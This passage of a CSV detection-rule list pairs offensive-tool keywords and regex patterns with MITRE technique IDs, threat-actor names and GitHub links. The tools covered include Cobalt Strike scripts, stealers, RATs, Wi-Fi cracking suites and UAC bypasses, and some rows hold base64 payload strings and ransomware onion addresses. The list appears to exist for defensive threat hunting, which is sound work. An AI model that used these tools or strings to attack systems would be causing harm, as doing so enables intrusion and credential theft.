Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","33722"
"*aggressor.py*",".{0,1000}aggressor\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","33723"
"*Aggressor/TikiTorch*",".{0,1000}Aggressor\/TikiTorch.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","33724"
"*AggressorScripts*",".{0,1000}AggressorScripts.{0,1000}","offensive_tool_keyword","AggressorScripts-1","Collection of Aggressor scripts for Cobalt Strike 3.0+ pulled from multiple sources","T1074 - T1070 - T1105 - T1558","TA0007 - TA0003 - TA0002 - TA0043","N/A","N/A","Exploitation tool","https://github.com/Cn33liz/AggressorScripts-1","1","1","N/A","N/A","N/A","1","2","1","2018-06-24T16:27:57Z","2019-10-18T12:56:35Z","33725"
"*aggressor-scripts*",".{0,1000}aggressor\-scripts.{0,1000}","offensive_tool_keyword","cobaltstrike","beacon generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/eddiezab/aggressor-scripts/tree/master","1","1","N/A","N/A","10","10","1","0","2021-01-29T21:01:58Z","2021-01-29T21:00:26Z","33726"
"*agoakfejjabomempkjlepdflaleeobhb*",".{0,1000}agoakfejjabomempkjlepdflaleeobhb.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","33727"
"*AgUAAAAAAAAAAAAOZG5zLmdvb2dsZS5jb20NL2V4cGVyaW1lbnRhbA*",".{0,1000}AgUAAAAAAAAAAAAOZG5zLmdvb2dsZS5jb20NL2V4cGVyaW1lbnRhbA.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","33730"
"*AHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA=*",".{0,1000}AHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA\=.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","33731"
"*ahmedkhlief/Ninja*",".{0,1000}ahmedkhlief\/Ninja.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","33732"
"*AhMyth-Android-RAT*",".{0,1000}AhMyth\-Android\-RAT.{0,1000}","offensive_tool_keyword","AhMyth-Android-RAT","AhMyth Android Rat","T1020 - T1071 - T1071.001","TA0002 - TA0003","N/A","N/A","Exploitation tool","https://github.com/AhMyth/AhMyth-Android-RAT","1","0","N/A","N/A","N/A","10","4747","1746","2021-08-12T21:23:08Z","2017-07-07T03:03:37Z","33733"
"*aholpfdialjgjfhomihkjbmgjidlcdno*",".{0,1000}aholpfdialjgjfhomihkjbmgjidlcdno.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","33734"
"*aHR0cDovL3BpbmdjYXN0bGUuY29t*",".{0,1000}aHR0cDovL3BpbmdjYXN0bGUuY29t.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","33735"
"*aHR0cDovL3BpbmdjYXN0bGUuY29t*",".{0,1000}aHR0cDovL3BpbmdjYXN0bGUuY29t.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","33736"
"*aHR0cHM6Ly9hcGkuZ2l0aHViLmNvbS9yZXBvcy9nZW50aWxraXdpL21pbWlrYXR6L3JlbGVhc2VzL2xhdGVzdA==*",".{0,1000}aHR0cHM6Ly9hcGkuZ2l0aHViLmNvbS9yZXBvcy9nZW50aWxraXdpL21pbWlrYXR6L3JlbGVhc2VzL2xhdGVzdA\=\=.{0,1000}","offensive_tool_keyword","ADSyncDecrypt","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","ADSyncDecrypt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","33737"
"*aHR0cHM6Ly9hcGkuZ2l0aHViLmNvbS9yZXBvcy9nZW50aWxraXdpL21pbWlrYXR6L3JlbGVhc2VzL2xhdGVzdA==*",".{0,1000}aHR0cHM6Ly9hcGkuZ2l0aHViLmNvbS9yZXBvcy9nZW50aWxraXdpL21pbWlrYXR6L3JlbGVhc2VzL2xhdGVzdA\=\=.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","ADSyncDecrypt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","33738"
"*ahsten.run \*powershell.exe*",".{0,1000}ahsten\.run\s\\.{0,1000}powershell\.exe.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","33739"
"*aiifbnbfobpmeekipheeijimdpnlpgpp*",".{0,1000}aiifbnbfobpmeekipheeijimdpnlpgpp.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","33741"
"*aiocmd\nested_completer.py*",".{0,1000}aiocmd\\nested_completer\.py.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","33742"
"*airbase-ng -*",".{0,1000}airbase\-ng\s\-.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","33743"
"*Airbash*",".{0,1000}Airbash.{0,1000}","offensive_tool_keyword","Airbash","A POSIX-compliant fully automated WPA PSK handshake capture script aimed at penetration testing.","T1565 - T1593 - T1594 - T1567","TA0002 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/tehw0lf/airbash","1","0","#linux","N/A","N/A","4","357","62","2024-10-13T01:02:18Z","2018-04-18T23:50:15Z","33744"
"*aircrack.txt*",".{0,1000}aircrack\.txt.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","33745"
"*Aircrack-ng*",".{0,1000}Aircrack\-ng.{0,1000}","offensive_tool_keyword","aircrack","WiFi security auditing tools suite.","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","33746"
"*aircrack-ng*",".{0,1000}aircrack\-ng.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","N/A","8","1","67","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z","33747"
"*aircrack-ptw-*",".{0,1000}aircrack\-ptw\-.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","33748"
"*airdecap-ng -*",".{0,1000}airdecap\-ng\s\-.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","33749"
"*aireplay-ng *",".{0,1000}aireplay\-ng\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","33750"
"*aireplay-ng *",".{0,1000}aireplay\-ng\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","33751"
"*aireplay-ng -*",".{0,1000}aireplay\-ng\s\-.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","33752"
"*Airgeddon*",".{0,1000}Airgeddon.{0,1000}","offensive_tool_keyword","Airgeddon","This is a multi-use bash script for Linux systems to audit wireless networks.","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/v1s1t0r1sh3r3/airgeddon","1","0","#linux","N/A","5","10","6882","1209","2025-04-15T19:43:18Z","2016-03-18T10:34:56Z","33753"
"*airgraph-ng -*",".{0,1000}airgraph\-ng\s\-.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","33754"
"*airman604/splunk_whisperer*",".{0,1000}airman604\/splunk_whisperer.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0004 - TA0003  - TA0008 - TA0011","N/A","N/A","C2","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","N/A","9","10","250","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z","33755"
"*airmon-ng*",".{0,1000}airmon\-ng.{0,1000}","offensive_tool_keyword","airmon-ng","This script can be used to enable monitor mode on wireless interfaces. It may also be used to kill network managers or go back from monitor mode to managed mode","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Sniffing & Spoofing","https://www.aircrack-ng.org/doku.php?id=airmon-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","33756"
"*airodump-ng *",".{0,1000}airodump\-ng\s.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","33757"
"*airodump-ng *",".{0,1000}airodump\-ng\s.{0,1000}","offensive_tool_keyword","aircrack","WiFi security auditing tools suite.","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","33758"
"*airodump-ng *",".{0,1000}airodump\-ng\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","33759"
"*airolib-ng airolib-db*",".{0,1000}airolib\-ng\sairolib\-db.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","33760"
"*airpwn-ng*",".{0,1000}airpwn\-ng.{0,1000}","offensive_tool_keyword","airpwn-ng","We force the targets browser to do what we want","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ICSec/airpwn-ng","1","1","N/A","N/A","N/A","1","36","13","2022-11-07T02:22:34Z","2021-07-20T03:43:13Z","33761"
"*airserv-ng -*",".{0,1000}airserv\-ng\s\-.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","33762"
"*airtun-ng -a *",".{0,1000}airtun\-ng\s\-a\s.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","33763"
"*aix2john.pl*",".{0,1000}aix2john\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","33764"
"*aix2john.py*",".{0,1000}aix2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","33765"
"*ajm4n/DLLHound*",".{0,1000}ajm4n\/DLLHound.{0,1000}","offensive_tool_keyword","DLLHound","Find potential DLL Sideloads on your windows computer","T1574.001 - T1574.002","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/ajm4n/DLLHound","1","1","N/A","N/A","7","3","201","22","2025-01-12T02:28:22Z","2024-12-20T02:26:16Z","33766"
"*ajpc500/BOFs*",".{0,1000}ajpc500\/BOFs.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","33767"
"*Aka    : x0xr00t*",".{0,1000}Aka\s\s\s\s\:\sx0xr00t.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","0","#content","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","33768"
"*akamai/DDSpoof*",".{0,1000}akamai\/DDSpoof.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","33769"
"*akiral2iz6a7qgd3ayp3l6yub7xx2uep76idk3u2kollpj5z3z636bad.onion*",".{0,1000}akiral2iz6a7qgd3ayp3l6yub7xx2uep76idk3u2kollpj5z3z636bad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","33771"
"*akiralkzxzq2dsrzsrvbr2xgbbu2wgsmxryd4csgfameg52n7efvr2id.onion*",".{0,1000}akiralkzxzq2dsrzsrvbr2xgbbu2wgsmxryd4csgfameg52n7efvr2id\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","33772"
"*akkuman/rotateproxy*",".{0,1000}akkuman\/rotateproxy.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","1","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","33774"
